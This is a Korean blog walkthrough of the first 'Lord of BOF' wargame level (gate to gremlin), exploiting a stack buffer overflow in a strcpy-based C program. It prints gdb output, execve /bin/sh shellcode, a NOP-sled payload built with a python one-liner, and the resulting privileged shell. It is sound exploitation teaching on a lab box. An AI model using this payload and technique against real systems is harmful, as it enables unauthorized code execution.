1. gate → gremlin

wargame 🏴‍☠️ write-up/Lord of BOF

1. gate → gremlin

Kortsec1 2018. 7. 23. 02:40

id : gate

pw : gate 로그인 해줍니다.

gremlin.c 소스코드는 다음과 같습니다.

[gate@localhost gate]$ cat gremlin.c
/*
	The Lord of the BOF : The Fellowship of the BOF 
	- gremlin
	- simple BOF
*/
 
int main(int argc, char *argv[])
{
    char buffer[256];
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}

buffer의 크기가 256byte이니, 쉘코드를 넣기에 충분할것 같네요..ㅎ

실행될때 더미(dummy; 쓰레기)값이 추가되는지 gdb를 통해 알아봅시다.

[gate@localhost gate]$ gdb -q gremlin
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048430 <main>:	push   %ebp
0x8048431 <main+1>:	mov    %ebp,%esp
0x8048433 <main+3>:	sub    %esp,0x100
0x8048439 <main+9>:	cmp    DWORD PTR [%ebp+8],1
0x804843d <main+13>:	jg     0x8048456 <main+38>
0x804843f <main+15>:	push   0x80484e0
0x8048444 <main+20>:	call   0x8048350 <printf>
0x8048449 <main+25>:	add    %esp,4
0x804844c <main+28>:	push   0
0x804844e <main+30>:	call   0x8048360 <exit>
0x8048453 <main+35>:	add    %esp,4
0x8048456 <main+38>:	mov    %eax,DWORD PTR [%ebp+12]
0x8048459 <main+41>:	add    %eax,4
0x804845c <main+44>:	mov    %edx,DWORD PTR [%eax]
0x804845e <main+46>:	push   %edx
0x804845f <main+47>:	lea    %eax,[%ebp-256]
0x8048465 <main+53>:	push   %eax
0x8048466 <main+54>:	call   0x8048370 <strcpy>
0x804846b <main+59>:	add    %esp,8
0x804846e <main+62>:	lea    %eax,[%ebp-256]
0x8048474 <main+68>:	push   %eax
0x8048475 <main+69>:	push   0x80484ec
0x804847a <main+74>:	call   0x8048350 <printf>
0x804847f <main+79>:	add    %esp,8
0x8048482 <main+82>:	leave  
0x8048483 <main+83>:	ret    
0x8048484 <main+84>:	nop    
0x8048485 <main+85>:	nop    
0x8048486 <main+86>:	nop    
0x8048487 <main+87>:	nop    
0x8048488 <main+88>:	nop    
0x8048489 <main+89>:	nop    
0x804848a <main+90>:	nop    
0x804848b <main+91>:	nop    
0x804848c <main+92>:	nop    
0x804848d <main+93>:	nop    
0x804848e <main+94>:	nop    
0x804848f <main+95>:	nop    
End of assembler dump.

<main+3>을 보면 별다른 더미값 없이 0x100(256)byte 만큼을 할당합니다.

그렇다면 스텍은 다음과 같이 쌓일 것 입니다.

buffer(256byte) || sfp(4byte) || ret(4byte)

sfp와 ret는 각각 스텍프레임포인터stack frame pointer와 리턴어드레스return address입니다.

sfp는 나중에 자세히 알아보도록 하고, 지금 우리가 알아볼 것은 ret입니다.

ret에는해당 함수가 끝난 다음 실행할 코드 주소가 들어있습니다.

즉, 이곳을 원하는 주소로 바꾸면 해당 주소에 있는 코드를 실행 시킬 수 있다는 것 입니다!!

자 그렇다면 우리가 입력할 공격 코드는 어떻게 구성되어야 할까요?

공격 코드
buffer(256byte)			sfp(4byte)	ret(4byte)
\x90 X 200(200byte)	쉘 코드(24byte)	A X 32(32byte)	BBBB(4byte)	\x90이 들어있는 주소

하나하나 알아봅시다.

\x90은 nop 이라는 어셈블리어 인데요, 아무것도 하지 않습니다.

즉, nop을 여러개 놓음 으로서, 정확하게 쉘코드의 주소를 알아낼 필요 없이 수많은 nop중 아무 주소를 알아내면

쭉 패스하다(일명 nop slide) 쉘코드가 실행되게 됩니다.

쉘 코드는 24byte 짜리를 이용 합시다.(구글링 하면 나옵니다^.^)

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

자, 이제 남은 것은 ret를 덮을때 넣을 \x90(nop)의 주소를 알아내는 건데요. gdb를 이용해서 알아봅시다.

gremlin에는 디버깅 권한이 없으니,

test파일을 복사해서 디버깅 해 봅시다.

[gate@localhost gate]$ ls
gremlin  gremlin.c
[gate@localhost gate]$ cp gremlin test
[gate@localhost gate]$ ls
gremlin  gremlin.c  test

[gate@localhost gate]$ gdb -q test
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048430 <main>:	push   %ebp
0x8048431 <main+1>:	mov    %ebp,%esp
0x8048433 <main+3>:	sub    %esp,0x100
0x8048439 <main+9>:	cmp    DWORD PTR [%ebp+8],1
0x804843d <main+13>:	jg     0x8048456 <main+38>
0x804843f <main+15>:	push   0x80484e0
0x8048444 <main+20>:	call   0x8048350 <printf>
0x8048449 <main+25>:	add    %esp,4
0x804844c <main+28>:	push   0
0x804844e <main+30>:	call   0x8048360 <exit>
0x8048453 <main+35>:	add    %esp,4
0x8048456 <main+38>:	mov    %eax,DWORD PTR [%ebp+12]
0x8048459 <main+41>:	add    %eax,4
0x804845c <main+44>:	mov    %edx,DWORD PTR [%eax]
0x804845e <main+46>:	push   %edx
0x804845f <main+47>:	lea    %eax,[%ebp-256]
0x8048465 <main+53>:	push   %eax
0x8048466 <main+54>:	call   0x8048370 <strcpy>
0x804846b <main+59>:	add    %esp,8
0x804846e <main+62>:	lea    %eax,[%ebp-256]
0x8048474 <main+68>:	push   %eax
0x8048475 <main+69>:	push   0x80484ec
0x804847a <main+74>:	call   0x8048350 <printf>
0x804847f <main+79>:	add    %esp,8
0x8048482 <main+82>:	leave  
0x8048483 <main+83>:	ret    
0x8048484 <main+84>:	nop    
0x8048485 <main+85>:	nop    
0x8048486 <main+86>:	nop    
0x8048487 <main+87>:	nop    
0x8048488 <main+88>:	nop    
0x8048489 <main+89>:	nop    
0x804848a <main+90>:	nop    
0x804848b <main+91>:	nop    
0x804848c <main+92>:	nop    
0x804848d <main+93>:	nop    
0x804848e <main+94>:	nop    
0x804848f <main+95>:	nop    
End of assembler dump.

gdb -q test => gdb의 라이센스 설명을 생략해주는 명령어 입니다.(-q)

set disassembly-flavor intel => 가독성이 더 좋은 intel 문법 형식으로 어셈블리어를 보게 하는 명령어 입니다.

disas main => main함수의 어셈블리코드를 보여줍니다.

<main+54>부분에서 buffer에 argv[1]인자값이 전달되므로,

<main+59>에다 breakpoint를 걸고 buffer속 \x90(nop)의 주소를 알아봅시다.

(gdb) b * main+59
Breakpoint 1 at 0x804846b
(gdb) r `python -c 'print "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62
\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "A"*32 + "BBBB" + "CCCC"'`
Starting program: /home/gate/test `python -c 'print "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f
\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "A"*32 + "BBBB" + "CCCC"'`

Breakpoint 1, 0x804846b in main ()
(gdb) x/100x $ebp-256
0xbffff948:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff958:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff968:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff978:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff988:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff998:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff9a8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff9b8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff9c8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff9d8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff9e8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff9f8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa08:	0x90909090	0x90909090	0x6850c031	0x68732f2f
0xbffffa18:	0x69622f68	0x50e3896e	0x99e18953	0x80cd0bb0
0xbffffa28:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffa38:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffa48:	0x42424242	0x43434343	0x00000000	0xbffffa94
0xbffffa58:	0xbffffaa0	0x40013868	0x00000002	0x08048380
0xbffffa68:	0x00000000	0x080483a1	0x08048430	0x00000002
0xbffffa78:	0xbffffa94	0x080482e0	0x080484bc	0x4000ae60
0xbffffa88:	0xbffffa8c	0x40013e90	0x00000002	0xbffffb8b
0xbffffa98:	0xbffffb9b	0x00000000	0xbffffca4	0xbffffcc6
0xbffffaa8:	0xbffffcd0	0xbffffcde	0xbffffcfd	0xbffffd0a
0xbffffab8:	0xbffffd22	0xbffffd3c	0xbffffd47	0xbffffd55
0xbffffac8:	0xbffffd95	0xbffffda5	0xbffffdba	0xbffffdca

미리 구성해두었던 공격 코드대로 넣어보았습니다. \x90(nop)이 있는 곳의 주소들 중 하나 골라봅시다. ex) 0xbffff978

ret에 들어갈 값까지 구했으니, 이제 python으로 공격 코드를 짜봅시다.

`python -c 'print "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "A"*32 + "BBBB" + "\x78\xf9\xff\xbf"'`

※ 마지막에, 주소값을 넣어줄때 리틀 엔디안little endian 방식으로, 자세한 내용은 이곳 에서 공부하시기 바랍니다~^^

[gate@localhost gate]$ ./gremlin `python -c 'print "\x90"*200 + "\x31\xc0\x50
\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b
\xcd\x80" + "A"*32 + "BBBB" + "\x78\xf9\xff\xbf"'`
1󿿐h//shh/bin⏓ᙰ
              ̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBx
bash$ id
uid=500(gate) gid=500(gate) euid=501(gremlin) egid=501(gremlin) groups=500(gate)
bash$ my-pass
euid = 501
hello bof world
bash$

성공적으로 쉘이 따지는 것을 볼 수 있습니다!!

'wargame 🏴‍☠️ write-up > Lord of BOF' 카테고리의 다른 글

4. goblin → orc (0)	2018.07.26
3. cobolt → goblin (0)	2018.07.25
2. gremlin → cobolt (1)	2018.07.23
LoB 원정대 start (0)	2018.07.23

현재글1. gate → gremlin

관계자외 출입 금지

ir code, expandAtFiles, 대상 파일, 중간 코드, cl.cl, Vulnerability, SSTI, web, 실행 파일 형식, 2023 Top 10, PortSwigger, 취약점, RCE, jenkins, PowerShell, 구문 분석, 어휘 분석, James Kettle, h4cking game, CVE-2024-23897,

Today :
Yesterday :

보안

1. gate → gremlin

'wargame 🏴‍☠️ write-up > Lord of BOF' 카테고리의 다른 글

'wargame 🏴‍☠️ write-up/Lord of BOF'의 다른글

티스토리툴바

« 2025/02 »
일	월	화	수	목	금	토
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28

1. gate → gremlin

'wargame 🏴‍☠️ write-up > Lord of BOF' 카테고리의 다른 글

'wargame 🏴‍☠️ write-up/Lord of BOF'의 다른글

관련글

티스토리툴바